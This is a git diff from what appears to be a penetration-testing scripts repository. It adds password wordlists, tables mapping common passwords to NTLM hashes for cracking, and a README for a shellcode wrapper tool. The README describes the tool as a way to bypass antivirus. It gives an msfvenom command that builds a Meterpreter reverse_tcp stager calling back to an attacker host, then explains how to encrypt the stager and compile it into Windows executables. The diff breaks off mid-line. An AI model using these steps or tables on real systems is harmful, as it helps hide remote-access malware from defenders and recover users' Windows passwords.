D016965B73C33DC8F838CF08136ECC2A +kawasaki 99A9395FD3B64A9FE499D9ADDE979263 +bishop A19DB4386E7BE09A57236A4414B88F2F +77777777 30AFF9DCAC5893153F9A1E9F81C8369E +vladimir 5606564E9A1897E3233A74FF7E1BDF7D +money1 7A2BAF05F5BE7281C8232674A66DBB68 +freeuser C375BEEAEE8DD7DB5C95D1E08E404765 +wildcats B83E834A0BF2790ED5ACA1A4CA8C58A7 +francis 1D92601969EB78C24B5CC6321C440D8B +disney A36FE1B262E7203B3F309CD797E39E0D +budlight 146CA8048085C582F7B93179B97C187F +brittany 74516D15BC64DADFD1BAD5009A8B5B7A +1994 AEFCA8B9FF267FC536AB0E979CDB1265 +00000000 9BDC61DB5A3FCED6D82D49279F1F0430 +sweet 6722A46A1AD6B0BF473532F034BEDCF7 +oksana AEA8A07DECD4E527ED552DC73B9BFD10 +honda 0D9ABD5DA9C1866C5BD831210A492743 +domino CDE75CE4BB1762ACFA8A1834E56B9662 +bulldogs 9DAD4A84003540C07A86A76D241429E8 +brutus 1E45976C9E3D612CBCE93D2BC352E674 +swordfis 3F7EB588C9FA4CC33243836317BBAD31 +norman 9E4B08DDB76026A47E71369C8DB24159 +monday 504F0869C852EBED40E4CC5AF2EB0A73 +jimmy D94DFAF3316EAE246763A1117BE7C7FF +ironman A46935067ACF46585A2699D76E504B0A +ford 7AE5838B473863E93AE4C227F13A9866 +fantasy 9A1797B6369612CA90955AD38AB163B0 +9999 66EC07BC45D2EAF331C307AF73FCB3B4 +7654321 8BB80565A55DEAA6E1847DC1BC3505FA +PASSWORD 7B592E4F8178B4C75788531B2E747687 +hentai 21BBE4B1E10B54B34D738BDD8E19B93F +duncan DB937463A5FBD8B75B1F791C8CFC525B +cougar A16A6D3E862BB4F3B483D35102C9EF07 +1977 E2A183F1479EE7E315DCCCC35FB1729E +jeffrey EF6EEF313A118150AB1180303F2EEBE6 +house EBCA7E91F46561E6A2AEBAAC2939655B +dancer AAD2FFCDA13B8D76AE6E1FAD6643D5B1 +brooke E7FDBB8C3E96AFB126617A2910C92A06 +timothy 91291069D8AD93A4A4169C4412D368BF +super FAD2607EDA55CA3ECF8D89067EE91F84 +marines E8A380A4504FF72FE31994DC0751DE98 +justice ACD9A824625367898B19DB28A762993B +digger 436AA276F5762078E0BB73E0223CD6EB +connor 2FAE447568AEF42EFAF458F11270C127 +patriots C3299EA612F013B3F8E658408A9ACCA8 +karina 8110C055D0964665F5A665631AD1DFB4 +202020 293A3BC1358282A3CFFACAEDA5C00B1A +molly D3D2B0E976F319C2474D467C4A7316AE +everton BBCFD8E6E106C51C25ADCAFAA92FD16A +tinker 9F7E52B85A80B96F89776106A1E827F5 +alicia 2171D634D0FD1B58B441A43DFA2C1CB5 +rasdzv3 0080219828399B12EE2031F42D6678FF +poop CBD34932CE3B85E027BBCA926922947D +pearljam 2CC5D9004ED29F2C4C898A525593DD45 +stinky 5E442A72FED04560DA5F0BDA505A37EA +naughty 658D516BB05DCDCFA437D9B94591B1B5 +colorado B076A06999018342F7C4F1844F07EF8D +123123a 07C7BDC8659269B9D93099E5031DC653 +water FA7A305180452A719D23DBC01478D998 +test123 C5A237B7E9D8E708D8436B6148A25FA1 +ncc1701d 0E8F12930782314EE4076F958D107204 +motorola 99AFF69ED25CA5F45572C5503A10D28F +ireland 606824736DD2645664EAF79FC31D1956 +asdfg 7D4CDDEE4D03CF40BCF86FD8AC0218FD +slut 7A13BCE6738C7F64C2CD7F8C8E8A5452 +matt B6FFB3200061D7B7928F0D932F095128 +houston CB8843B1C0453788848EFEA1A1CC7386 +boogie 3B4D917DA24839215425AEBA3C5D6514 +zombie 7BE033638F235D5D032CADA36628A48A +accord FC2CA8BB4AAB1361A65D466030F079EF +vision 8FAC6189104A8819C13641FF7C0BBED3 +bradley 30AE9FC7AEC9ED706037A45AAA45CCE4 +reggie 85190FF7A8002B610B49E6FC2C0CF1DE +kermit 52F781707878C6E7460B3FC6DB2D244A +froggy 9BBC0A389DFCC36141E12EFD227C5DDF +ducati 7E1CA49C4EC705739555B3C5F81B2C2F +avalon 96AC9424E53177E519E08F2043C21243 +6666 2E745B779D27DB096DA994AF28134CBA +9379992 E6CF1159D5091DDC95738C455F19EA1E +sarah 74138648DB6C91F3B109E33AF2B67490 +saints 114DE85381A7B3F8DBD9A96366BF21BF +logitech B86F1B9E55C9A4D39E6E416FD8E3EE62 +chopper 7394EDD37951305C3F8FD2DB6AFF1D33 +852456 562F0E091B1C7BE2F3AB3E20FA64CB46 +simpson CAC7481372A36788D46BC5753ADEE74A +madonna E1D635834839988AE864875CBCFAF503 +juventus 500AF5AD830C44E03D6F7E0E54B8ACBC +claire F638FC4BDDE2C88BD812A5828C796E14 +159951 5489CAF5134471E765DA929474E3E562 +zachary 79CDC6666A2BE1CA26B3EFF7B366AD78 +yfnfif 011171C21CD1C55A3D187139D8DDD852 +wolverin 1030689A16876A3DBE10D4BFA0B97A1F +warcraft A9DA2F152EBB7D91B7EA9EAB0D28EF22 +hello123 110D0C51E144D36FB7E4F9E012FBB888 +extreme 414CA63926D2132B9BE84E0CAC3B931A +penis 562FD3BF84D5E8146E1441EAC1A8D374 +peekaboo ECE225346BF87AA146D7130C0825EAFF +fireman E24C6D0909BDB946DFB81EC7979FEACA +eugene B1690F392A6531C3396A28528E0BB3B6 +brenda 4D59E1528D783959B37FEDFE414C3F67 +123654789 B8258D48B307B344B33FB26CC2D2F60F +russell 8C4077519E7C8D31539748F02509B93A +panthers 8C76D899744950727DC5464CF13CFD90 +georgia 784C5CBF8DCCA9163B0EE0D7F9D71B18 +smith 48FF5741A4F96D75A9DC23432A6C2FB6 +skyline 4925701BF69F4A2D09584EC98BDFD87C +jesus 5D05E3883AFC84F1842F8B1C6D895FA4 +elizabet 68D7CF4CAA2E46620E794408574EACE0 +spiderma DFFB35E39ECAA3A55ECDB516CFDE2488 +smooth 9F30D2F27DF47145CDBABE5C7C90CBA0 +pirate 376C17A16A7B2FBF48E16181EBA6E020 +empire E431EAF1AAA4B309A721D657401675A6 +bullet 713CA7DE243B0B09C253FD53056F188A +8888 AA51B6C80ECED780C26B473E8B91FBC1 +virginia A65C3DA63FDB6CA22C172B13169D62A5 +valentin 0BF906A57ABDE0A8EA81AA45B860B255 +psycho 4BE00AC1DB24F50D58BCA20E7D153094 +predator 9A94EAF6396FECA7AF086ABE06FC1DD4 +arizona 139A50C9E8F87DA464447FEA5ACDA5B3 +134679 B723E339EF1CB77962EB14972D98CC77 +mitchell EA932E99F71D9A74ED2FB5D5F3C93DD2 +alyssa 80C06815FF2D72159FDC792A659D760F +vegeta 352761558A51E660618B6DB64F5319B2 +titanic 02F85F363D0A2AAF89A975BD866E0BD8 +christ 9B5E0E930414D9E47DD1C14C235C87C4 +goblue 676CCE6926C48B7FA62B313866F67756 +fylhtq 1A04A81ECA495E2525FEDFD9808D5F40 +wolf E1F0871F0337417B5811711F4B059FFA +mmmmmm FF4EF4C1DD99FFC59D982E40522FF474 +kirill CAA69797731C555D87B185577E8A62BC +indian 1471313A18EF48C7372FACBE0B41E8C6 +hiphop F8003A8EED9C5AD6612E8E5D04C1339B +baxter D7A898205589C97A081ECFE4E1D03DAC +awesome 95897CB672FE6203AC2135285DA4276F +people 4B9574C6695183905A1047F8A30625F5 +danger C8560287111DF29D3FF3CF3D071BF6D9 +roland F806824B78318D1502B6B97D3D684153 +mookie 4D7CF5AD1758801407E58EB12BE080A7 +741852963 E7DA2BD1C1D8F2619D19DB3743523F1D +1111111111 B6E4EA41C0D118454777D4C2D6752D68 +dreamer 64612B949FE9AD493EFA2752301B4452 +bambam 7D655CE22C704959AA367A17B815FA1B +arnold 10A8D9B2832739356D4DCCC1DBE43FCE +1981 07D5D7BA0576C1D5F2B62C6A1583DF60 +skipper E44F0AD530687D9401FF85B4D00733D3 +serega 1B8304658903E964E03ED794640CBB4A +rolltide 544EB28765DD23326F64807F7E87A9C5 +elvis DB28C206B1E5D6FC334C070D192B06D6 +changeme 6597D9FE8469E21D840E2CBFF8D43C8B +simon 7F09741053B68B6C4CC1B01F93A8538F +1q2w3e 2176503CCD06D05BBCE3E934465C555A +lovelove 14F7832898C6EB638F8F3DEFE7A501E6 +fktrcfylh 00C16C6E93F48D84621934D56F05951C +denver 6D1008087A311CBF48965C631281F91A +tommy 4ACD250DD63564CBDA6D4989E7DA259C +mine EC644FCFEDE7DD0FD1682B148CD28F21 +loverboy F4FD59ACC83B38A6DCE89E1646D03845 +hobbes 317B85626E4A2EB9AD5E86D67DB81BE0 +happy1 2414034A2C542A707575FFDE549C4F26 +alison 779312112F8B56203F93028EF4D2B744 +nemesis B74D3729ABA4EABF9E4E86B7EC600744 +chevelle 68D7E3D15EA4D945D39691F5FF0A612C +cardinal 248063506B5649ECC218A630A3539D5A +burton A2270D1E38922C13535DC9751BFBC8AD +wanker 2B2DA510BD32083C96950252C476CAC3 +picard 0E7B19A4C09FC5861B4E02AE37DF3BC0 +151515 0909DF2BE620D82633DBE6DF2A14E822 +tweety C719A1DD2F5F470F79C76C556DA69739 +michael1 C8F275DED37BC14ACE5B5910F9B86388 +147852369 C184E77CA70780C3CAF5E6DB12221C50 +12312 7CEEA3239DA68CB1D778D4C2EBE2389E +xxxx C7B983518C1D8F2928701D835338EE72 +windows A2345375A47A92754E2505132ACA194B +turkey 344E4C6864986E8846FABE089E1326EC +456789 627782B7274E323941C9418399460D5B +1974 25B3C1D2DD13CEC137D42AEF7CA6F3DD +vfrcbv 447004CD518FB2A90C9469BDAA75DE6A +sublime 0F57149D11024655C35299616B9A6724 +1975 6A0426F4D83012B9705D6C103BFB0DB9 +galina DF1DE7C29AA89E35D5E7F7CC52BB2187 +bobby B362B73F9F9CC7A7FE0B5F3E0CF39986 +newport 6F761233DDB140ED4669559CB90AAA9F +manutd 9BF0F1420FC94EC7FA631EADCB0ED508 +daddy 5F0AE51837749902C55E2E9E805C500A +american D9C762658D3152F60BCE4B3BA6652C29 +alexandr 821758FA38D94BB92734E3779D7CA61F +1966 07AD3D18D8AE8F47B4F5BE7E9801AF8B +victory 845479748CDD4DA17FD2AE15EA17FC73 +rooster 35E200828B6CF73E7EC9DA841628D90D +qqq111 BE321C70BCED9663F0350C2A5F55B2FD +madmax 51FEB87A2463C28AC11BA7A537C98378 +electric D1D341670E6E65EFA3A386E5FC43DF5C +bigcock 94E8ED93199C27809BE4C004CA98CE2F +a1b2c3 B23A90D0AAD9DA3615FAFC27A1B8BAEB +wolfpack 243AC39F2E2307493CB7B97BA084F1AB +spring 52C7C75D30068D7B336E8E523704BBF8 +phpbb 7B6E8960B2A531B5254F4AE6A593FD3F +lalala 65C6EC17EF9B24CBF4FEE752FF8BAE18 +suckme C9F74EE3F2A93B899C288AFDF3143D2C +spiderman 8758304B6AF01BB8CE1691495D29CB61 +eric 691A324A968D3285E4FC146A4B7F8D28 +darkside EFEB76E50E753C00E6A5295838DB1471 +classic B63923EDC8014071B1372D380E1EE139 +raptor 9C046B8D78BAB777DD975CCDDECA43BB +123456789q D18603195F5EA12806F5C37072CC57E6 +hendrix A114182EB79F5B0C07805C1633C776C3 +1982 7FCFE1B7EC6BD8E65E0C4369170D646C +wombat 02C9F7A52981274622E34E9CD7AAABEC +avatar B22ED2A856789548C32B88BB12D32CC0 +alpha C89EEE2B363E6DE65346D055E0C839E1 +zxc123 2F9BD870961E14E1B7FD955F199E93A4 +crazy 7C99C335186D9073BA105B09D91E51CD +hard E261101EAEE3E7256E67AE29F98823F1 +england 24600FAFB278A17FA6DFA1157705754B +brazil 60B3823513A1199A423CCE7C26D70EB8 +1978 65AD2F8DE3E966D9EB63012C03BD0D09 +01011980 8B087181519CCAC830E74658B8C19818 +wildcat A7BD1ED44AF3CB03FE4B5552905084AA +polina F2DFA3096FA6071CC1029E77640ADD6C +freepass B2972B5E43AB3BB01C98B488F2699083 diff --git a/scripts/NTLM_hash_Generator/top_1000_passwd.txt b/scripts/NTLM_hash_Generator/top_1000_passwd.txt new file mode 100644 index 0000000..5203ea8 --- /dev/null +++ b/scripts/NTLM_hash_Generator/top_1000_passwd.txt @@ -0,0 +1,1000 @@ +123456 +password +12345678 +qwerty +123456789 +12345 +1234 +111111 +1234567 +dragon +123123 +baseball +abc123 +football +monkey +letmein +696969 +shadow +master +666666 +qwertyuiop +123321 +mustang +1234567890 +michael +654321 +pussy +superman +1qaz2wsx +7777777 +fuckyou +121212 +000000 +qazwsx +123qwe +killer +trustno1 +jordan +jennifer +zxcvbnm +asdfgh +hunter +buster +soccer +harley +batman +andrew +tigger +sunshine +iloveyou +fuckme +2000 +charlie +robert +thomas +hockey +ranger +daniel +starwars +klaster +112233 +george +asshole +computer +michelle +jessica +pepper +1111 +zxcvbn +555555 +11111111 +131313 +freedom +777777 +pass +fuck +maggie +159753 +aaaaaa +ginger +princess +joshua +cheese +amanda +summer +love +ashley +6969 +nicole +chelsea +biteme +matthew +access +yankees +987654321 +dallas +austin +thunder +taylor +matrix +william +corvette +hello +martin +heather +secret +fucker +merlin +diamond +1234qwer +gfhjkm +hammer +silver +222222 +88888888 +anthony +justin +test +bailey +q1w2e3r4t5 +patrick +internet +scooter +orange +11111 +golfer +cookie +richard +samantha +bigdog +guitar +jackson +whatever +mickey +chicken +sparky +snoopy +maverick +phoenix +camaro +sexy +peanut +morgan +welcome +falcon +cowboy +ferrari +samsung +andrea +smokey +steelers +joseph +mercedes +dakota +arsenal +eagles +melissa +boomer +booboo +spider +nascar +monster +tigers +yellow +xxxxxx +123123123 +gateway +marina +diablo +bulldog +qwer1234 +compaq +purple +hardcore +banana +junior +hannah +123654 +porsche +lakers +iceman +money +cowboys +987654 +london +tennis +999999 +ncc1701 +coffee +scooby +0000 +miller +boston +q1w2e3r4 +fuckoff +brandon +yamaha +chester +mother +forever +johnny +edward +333333 +oliver +redsox +player +nikita +knight +fender +barney +midnight +please +brandy +chicago +badboy +iwantu +slayer +rangers +charles +angel +flower +bigdaddy +rabbit +wizard +bigdick +jasper +enter +rachel +chris +steven +winner +adidas +victoria +natasha +1q2w3e4r +jasmine +winter +prince +panties +marine +ghbdtn +fishing +cocacola +casper +james +232323 +raiders +888888 +marlboro +gandalf +asdfasdf +crystal +87654321 +12344321 +sexsex +golden +blowme +bigtits +8675309 +panther +lauren +angela +bitch +spanky +thx1138 +angels +madison +winston +shannon +mike +toyota +blowjob +jordan23 +canada +sophie +Password +apples +dick +tiger +razz +123abc +pokemon +qazxsw +55555 +qwaszx +muffin +johnson +murphy +cooper +jonathan +liverpoo +david +danielle +159357 +jackie +1990 +123456a +789456 +turtle +horny +abcd1234 +scorpion +qazwsxedc +101010 +butter +carlos +password1 +dennis +slipknot +qwerty123 +booger +asdf +1991 +black +startrek +12341234 +cameron +newyork +rainbow +nathan +john +1992 +rocket +viking +redskins +butthead +asdfghjkl +1212 +sierra +peaches +gemini +doctor +wilson +sandra +helpme +qwertyui +victor +florida +dolphin +pookie +captain +tucker +blue +liverpool +theman +bandit +dolphins +maddog +packers +jaguar +lovers +nicholas +united +tiffany +maxwell +zzzzzz +nirvana +jeremy +suckit +stupid +porn +monica +elephant +giants +jackass +hotdog +rosebud +success +debbie +mountain +444444 +xxxxxxxx +warrior +1q2w3e4r5t +q1w2e3 +123456q +albert +metallic +lucky +azerty +7777 +shithead +alex +bond007 +alexis +1111111 +samson +5150 +willie +scorpio +bonnie +gators +benjamin +voodoo +driver +dexter +2112 +jason +calvin +freddy +212121 +creative +12345a +sydney +rush2112 +1989 +asdfghjk +red123 +bubba +4815162342 +passw0rd +trouble +gunner +happy +fucking +gordon +legend +jessie +stella +qwert +eminem +arthur +apple +nissan +bullshit +bear +america +1qazxsw2 +nothing +parker +4444 +rebecca +qweqwe +garfield +01012011 +beavis +69696969 +jack +asdasd +december +2222 +102030 +252525 +11223344 +magic +apollo +skippy +315475 +girls +kitten +golf +copper +braves +shelby +godzilla +beaver +fred +tomcat +august +buddy +airborne +1993 +1988 +lifehack +qqqqqq +brooklyn +animal +platinum +phantom +online +xavier +darkness +blink182 +power +fish +green +789456123 +voyager +police +travis +12qwaszx +heaven +snowball +lover +abcdef +00000 +pakistan +007007 +walter +playboy +blazer +cricket +sniper +hooters +donkey +willow +loveme +saturn +therock +redwings +bigboy +pumpkin +trinity +williams +tits +nintendo +digital +destiny +topgun +runner +marvin +guinness +chance +bubbles +testing +fire +november +minecraft +asdf1234 +lasvegas +sergey +broncos +cartman +private +celtic +birdie +little +cassie +babygirl +donald +beatles +1313 +dickhead +family +12121212 +school +louise +gabriel +eclipse +fluffy +147258369 +lol123 +explorer +beer +nelson +flyers +spencer +scott +lovely +gibson +doggie +cherry +andrey +snickers +buffalo +pantera +metallica +member +carter +qwertyu +peter +alexande +steve +bronco +paradise +goober +5555 +samuel +montana +mexico +dreams +michigan +cock +carolina +yankee +friends +magnum +surfer +poopoo +maximus +genius +cool +vampire +lacrosse +asd123 +aaaa +christin +kimberly +speedy +sharon +carmen +111222 +kristina +sammy +racing +ou812 +sabrina +horses +0987654321 +qwerty1 +pimpin +baby +stalker +enigma +147147 +star +poohbear +boobies +147258 +simple +bollocks +12345q +marcus +brian +1987 +qweasdzxc +drowssap +hahaha +caroline +barbara +dave +viper +drummer +action +einstein +bitches +genesis +hello1 +scotty +friend +forest +010203 +hotrod +google +vanessa +spitfire +badger +maryjane +friday +alaska +1232323q +tester +jester +jake +champion +billy +147852 +rock +hawaii +badass +chevy +420420 +walker +stephen +eagle1 +bill +1986 +october +gregory +svetlana +pamela +1984 +music +shorty +westside +stanley +diesel +courtney +242424 +kevin +porno +hitman +boobs +mark +12345qwert +reddog +frank +qwe123 +popcorn +patricia +aaaaaaaa +1969 +teresa +mozart +buddha +anderson +paul +melanie +abcdefg +security +lucky1 +lizard +denise +3333 +a12345 +123789 +ruslan +stargate +simpsons +scarface +eagle +123456789a +thumper +olivia +naruto +1234554321 +general +cherokee +a123456 +vincent +Usuckballz1 +spooky +qweasd +cumshot +free +frankie +douglas +death +1980 +loveyou +kitty +kelly +veronica +suzuki +semperfi +penguin +mercury +liberty +spirit +scotland +natalie +marley +vikings +system +sucker +king +allison +marshall +1979 +098765 +qwerty12 +hummer +adrian +1985 +vfhbyf +sandman +rocky +leslie +antonio +98765432 +4321 +softball +passion +mnbvcxz +bastard +passport +horney +rascal +howard +franklin +bigred +assman +alexander +homer +redrum +jupiter +claudia +55555555 +141414 +zaq12wsx +shit +patches +nigger +cunt +raider +infinity +andre +54321 +galore +college +russia +kawasaki +bishop +77777777 +vladimir +money1 +freeuser +wildcats +francis +disney +budlight +brittany +1994 +00000000 +sweet +oksana +honda +domino +bulldogs +brutus +swordfis +norman +monday +jimmy +ironman +ford +fantasy +9999 +7654321 +PASSWORD +hentai +duncan +cougar +1977 +jeffrey +house +dancer +brooke +timothy +super +marines +justice +digger +connor +patriots +karina +202020 +molly +everton +tinker +alicia +rasdzv3 +poop +pearljam +stinky +naughty +colorado +123123a +water +test123 +ncc1701d +motorola +ireland +asdfg +slut +matt +houston +boogie +zombie +accord +vision +bradley +reggie +kermit +froggy +ducati +avalon +6666 +9379992 +sarah +saints +logitech +chopper +852456 +simpson +madonna +juventus +claire +159951 +zachary +yfnfif +wolverin +warcraft +hello123 +extreme +penis +peekaboo +fireman +eugene +brenda +123654789 +russell +panthers +georgia +smith +skyline +jesus +elizabet +spiderma +smooth +pirate +empire +bullet +8888 +virginia +valentin +psycho +predator +arizona +134679 +mitchell +alyssa +vegeta +titanic +christ +goblue +fylhtq +wolf +mmmmmm +kirill +indian +hiphop +baxter +awesome +people +danger +roland +mookie +741852963 +1111111111 +dreamer +bambam +arnold +1981 +skipper +serega +rolltide +elvis +changeme +simon +1q2w3e +lovelove +fktrcfylh +denver +tommy +mine +loverboy +hobbes +happy1 +alison +nemesis +chevelle +cardinal +burton +wanker +picard +151515 +tweety +michael1 +147852369 +12312 +xxxx +windows +turkey +456789 +1974 +vfrcbv +sublime +1975 +galina +bobby +newport +manutd +daddy +american +alexandr +1966 +victory +rooster +qqq111 +madmax +electric +bigcock +a1b2c3 +wolfpack +spring +phpbb +lalala +suckme +spiderman +eric +darkside +classic +raptor +123456789q +hendrix +1982 +wombat +avatar +alpha +zxc123 +crazy +hard +england +brazil +1978 +01011980 +wildcat +polina +freepass \ No newline at end of file diff --git a/scripts/NTLM_hash_Generator/top_100_ntlm_hash.txt b/scripts/NTLM_hash_Generator/top_100_ntlm_hash.txt new file mode 100644 index 0000000..4f076bb --- /dev/null +++ b/scripts/NTLM_hash_Generator/top_100_ntlm_hash.txt @@ -0,0 +1,100 @@ +12345 7A21990FCD3D759941E45C490F143D5F +123456 32ED87BDB5FDC5E9CBA88547376818D4 +123456789 C22B315C040AE6E0EFEE3518D830362B +test1 AACD12D27C87CAC8FC0B8538AED6F058 +password 8846F7EAEE8FB117AD06BDD830B7586C +12345678 259745CB123A52AA2E693AAACCA2DB52 +zinch C1790553DBB8362FA7F16D564585B4D1 +g_czechout B9ACFD3C52ED0D6988BED8EB9AC636D6 +asdf E5810F3C99AE2ABB2232ED8458A61309 +qwerty 2D20D252A479F485CDF5E171D93985BF +1234567890 8AF326AA4850225B75C592D4CE19CCF5 +1234567 328727B81CA05805A68EF26ACB252039 +Aa123456. 0E032B9D51A580AC6CDFABAD8BC97A38 +iloveyou B963C57010F218EDC2CC3C229B5E4D0F +1234 7CE21F17C0AEE7FB9CEBA532D0546AD6 +abc123 F9E37E83B83C47A93C2F09F66408631B +111111 2D7F1A5A61D3A96FB5159B5EEF17ADC6 +123123 579110C49145015C47ECD267657D3174 +dubsmash 6AA8BC1D5018300D54E51C9860FA961C +test 0CB6948805F797BF2A82807973B89537 +princess FB4BF3DDF37CF6494A9905541290CF51 +qwertyuiop 0D757AD173D2FC249CE19364FD64C8EC +sunshine 31C72C210ECC03D1EAE94FA496069448 +BvtTest123 6E448026FD87B9CD3FAE1AD39BF5F60B +11111 E9FCEFF7358F2D3BBAC2B31841E874F2 +ashley C27975D3A5B9E95ACD37EC1B1B7598B8 +00000 FA155978889A70EF632D95A63CDC8215 +000000 3FA45A060BD2693AE4C05B601D05CA0C +password1 5835048CE94AD0564E29A924A03510EF +monkey F2477A144DFF4F216AB81F2AC3E3207D +livetest AA25B9A5D53B081C29BB18E792BED7DC +55555 DAA7506C700D2C81DDEF50307D4216E8 +soccer BF4C3092A586DF1A9137A4F5737BDC94 +charlie 8D44C8FF3A4D1979B24BFE29257173AD +asdfghjkl 308C4A9A9120C711CFB117EC019E1A9A +654321 4057B60B514C5402DDE3D29A1845C366 +family F1F7D2C8DCE02804AEDB4283D20D4E2C +michael BB53A477AF18526ADA697CE2E51F76B3 +123321 AF27EFB60C7B238910EFE2A7E0676A39 +football 31FC0DC8F7DFAD0E8BD7CCC3842F2CE9 +baseball 320A78179516C385E35A93FFA0B1C4AC +q1w2e3r4t5y6 D3FB2C532B4BA3358FFC9BEEFE4A0AD6 +nicole 5FAE731C7178D87975F3637A5B2A7E92 +jessica 9E1E3566B088998352F65826CCAF5FC0 +purple 84440338F26BF725BE78C015F7D62C88 +shadow 8D4EF8654A9ADC66D4F628E94F66E31B +hannah D78ED82380A53851BCBDFB612C6B8B8A +chocolate B8018BBB613B4454D120F964B27C0335 +michelle 92B7B06BB313BF666640C5A1E75E0C18 +daniel C52ABB1E14677D7EA228FCC1171ED7B7 +maggie EC2C9F3346AF1FB8E4EE94F286BAC5AD +qwerty123 7773C08920232397CAE081704964B786 +hello 066DDFD4EF0E9CD7C256FE77191EF43C +112233 6103D9D963C57275DD3533674708E7BE +jordan DD555241A4321657E8B827A40B67DD4A +tigger B7E0EA9FBFFCF6DD83086E905089EFFD +666666 E8CD0E4A9E89EAB931DC5338FCBEC54A +987654321 162E829BE112225FEDF856E38E1C65FE +superman 72F5CFA80F07819CCBCFB72FEB9EB9B7 +12345678910 9F8CC8C6E9E8BA3344CE00078175A4FF +summer 85AC333BBFCBAA62BA9F8AFB76F06268 +1q2w3e4r5t 3E24DCEAD23468CE597D6883C576F657 +fitness 7D2A97A17B25A48B85BAF5391F72FA70 +bailey 97B592737F87A48FE07E59DB8659D166 +zxcvbnm 59DEA36D05AACAA547DE42E9956678E7 +fuckyou 1C4ECC8938FB93812779077127E97662 +121212 6920C58D0DF184D829189C44FAFB7ECE +buster 58DEF5844FE58E8F26A65FFF9DEB3827 +butterfly F3FE9E6330783D307510CC18645B1D0F +dragon F7EB9C06FAFAA23C4BCF22BA6781C1E2 +jennifer BF1E7D0739F270A842463D7A211BD5B8 +amanda 4BBAADE10297A06E77F371481E7D1E5C +justin EAC8EC95B0AB5750BA3E562997D3665C +cookie 9582F58CBF5013A5AFF1F7E5CD2DE6DE +basketball CF5FD610B326E61F175E3A9BAC4751F9 +shopping 90A44EDBFE56797D29B9B926FD958AA5 +pepper FE98FE86451FCCB2CA4EBC99D13379BE +joshua 2049B70EC5B6944AED5FEF05BC4B1933 +hunter 2BDCAD6D2082323222A291328AB4883E +ginger CB13139D77DE9279F84BEA474A20098A +matthew E57FF0A3E87BF1B7652D464E6C20304A +abcd1234 B3EC3E03E2A202CBD54FD104B8504FEF +taylor F648163703E6C08E66E778C9FCF1C695 +samantha E8A38F149BF33B7E1678CB0676DD9DF5 +whatever E653E6452753C97E46792567DFF599B6 +andrew 651DE33D6CDF9231B43056FF7071601F +1qaz2wsx3edc 35B3DAD379CFDC5D7A191D877FB0E057 +thomas 2D0BC7FE9CD9293CDC87B2162A52A4A0 +jasmine 1D1998B165C6F302BD1D6F89ECCE153D +animoto 7EA574C644C46D5E56DB4BB446E0C9B2 +madison 92B668493AB02A17DBB21616E71B2AE2 +0987654321 EEF285F4C800BCD1AE1E84C371EEB282 +54321 FCAACFDD47BBFCD6E84435B412DC52A7 +flower CADF85840719818D209D7B014D975CEF +Password A4F49C406510BDCAB6824EE7C30FD852 +maria E2F2B5DC43D03CCA5EB349A800854416 +babygirl 4C090B2A4A9A78B43510CEEC3A60F90B +lovely ED009A5DC9AD1848D4FC077205315AED +sophie AEF4A13358D107527B3582272E0959B1 +Chegg123 A9E129DA65395117CACD9E945979F26B diff --git a/scripts/NTLM_hash_Generator/top_100_passwd.txt b/scripts/NTLM_hash_Generator/top_100_passwd.txt new file mode 100644 index 0000000..29eb3c1 --- /dev/null +++ b/scripts/NTLM_hash_Generator/top_100_passwd.txt @@ -0,0 +1,100 @@ +12345 +123456 +123456789 +test1 +password +12345678 +zinch +g_czechout +asdf +qwerty +1234567890 +1234567 +Aa123456. +iloveyou +1234 +abc123 +111111 +123123 +dubsmash +test +princess +qwertyuiop +sunshine +BvtTest123 +11111 +ashley +00000 +000000 +password1 +monkey +livetest +55555 +soccer +charlie +asdfghjkl +654321 +family +michael +123321 +football +baseball +q1w2e3r4t5y6 +nicole +jessica +purple +shadow +hannah +chocolate +michelle +daniel +maggie +qwerty123 +hello +112233 +jordan +tigger +666666 +987654321 +superman +12345678910 +summer +1q2w3e4r5t +fitness +bailey +zxcvbnm +fuckyou +121212 +buster +butterfly +dragon +jennifer +amanda +justin +cookie +basketball +shopping +pepper +joshua +hunter +ginger +matthew +abcd1234 +taylor +samantha +whatever +andrew +1qaz2wsx3edc +thomas +jasmine +animoto +madison +0987654321 +54321 +flower +Password +maria +babygirl +lovely +sophie +Chegg123 \ No newline at end of file diff --git a/scripts/ShellcodeWrapper/readme.md b/scripts/ShellcodeWrapper/readme.md new file mode 100644 index 0000000..fac1af4 --- /dev/null +++ b/scripts/ShellcodeWrapper/readme.md @@ -0,0 +1,50 @@ +Mutlibyte XOR or AES encrypted shellcode +============ + +Author: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x) + +These little proof of concept are inspired by this blogpost: [Bypass antivirus with 10 lines of code](http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html) + +The technique uses two kind of code file: + +1. The shellcode encoder/encrypter: `shellcode_encoder.py` +2. Various shellcode wrapper, in C++, C# and Python: + - `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption + - `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption + - `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption + +Installation +---------------------- +Installation is straight forward: +* Git clone this repository: `git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper` +* cd into the ShellcodeWrapper folder: `cd ShellcodeWrapper` +* Install requirements using `pip install -r requirements.txt` +* Give the execution rights to the main script: `chmod +x shellcode_encoder.py` + +Usage +---------------------- +First, you need to obtain a usable shellcode from metasploit (*run it from a Kali distribution*), for example: +``` +root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw +``` + +In this example, the output is a raw (*unencoded & unencrypted*) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (*payload and parameters*). + +Second, run the `shellcode_encoder.py` script along with the desired arguments: + - raw shellcode filename + - encryption key + - encryption type: `xor` or `aes` + - desired output: `base64`, `cpp`, `csharp`, `python` + +For instance, to xor encrypt the shellcode with the key '*thisismykey*' and get an output code file in C#, C++ and Python: +``` +root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor +``` +This will generate C#, C++ and Python code file in the `result` folder. Those files are ready to use/compile. + +Eventually: + +1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for **Win32 console application** and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly). +2. For the C# wrapper, compile the C# code file into a Windows executable: + `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs` +3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable diff --git 